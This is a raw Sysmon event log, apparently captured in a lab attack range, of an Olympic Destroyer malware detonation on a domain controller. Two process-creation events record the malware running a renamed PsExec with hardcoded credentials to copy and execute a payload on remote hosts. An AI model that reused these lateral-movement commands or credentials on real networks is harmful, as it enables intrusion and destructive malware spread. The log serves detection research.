10:56:55.012{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F7-6216-BE05-000000003802}4456C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.997{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F7-6216-BE05-000000003802}4456C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000217751Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:53.629{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51413-false10.0.1.12-8000- 23542300x8000000000000000217750Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:56.135{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F839AD12DB434331A1BCCF410F1CBD03,SHA256=394A5E926C0AC3D4E749D55505765A886DB6167123A6D39C3233EF74EC05438D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:56.965{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F8-6216-C005-000000003802}2732C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:56.965{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F8-6216-C005-000000003802}2732C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:56.828{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F8-6216-BF05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:56.813{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:56.813{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:56.813{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:56.813{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:56.813{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-12F8-6216-BF05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:56.818{C8EA50B7-12F8-6216-BF05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-12.eu-central-1.compute.internal -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:56.813{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F8-6216-BF05-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:56.782{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=09A519AFFCEC97611FEB775D9BFD57E5,SHA256=484049A171A572407EEEE4969D0B476641BA3AFE161663101CB23B662B716E49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:56.081{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A50B99497B4D741451227003E565C759,SHA256=71660605CF0BC079531F15D64E84F933EA82EF3DAEFD12E24745DAB47EF02282,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217752Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:57.370{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C498B00D40219FB4BA699A4D3ED125A,SHA256=DE2E20058281B3BFA2DD99940590B5D3F3050FCA7E9D6FA269AF49BBB2A753B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.953{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F9-6216-C705-000000003802}6960C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.953{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F9-6216-C705-000000003802}6960C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.931{C8EA50B7-12F9-6216-C705-000000003802}6960340C:\Windows\system32\conhost.exe{C8EA50B7-12F9-6216-C505-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.900{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F9-6216-C705-000000003802}6960C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.900{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F9-6216-C705-000000003802}6960C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.868{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F9-6216-C605-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.868{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.868{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.868{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.868{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.853{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-12F9-6216-C605-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.866{C8EA50B7-12F9-6216-C605-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.853{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F9-6216-C605-000000003802}5800C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.853{C8EA50B7-12EB-6216-6B05-000000003802}6184C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.853{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.853{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:57.853{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 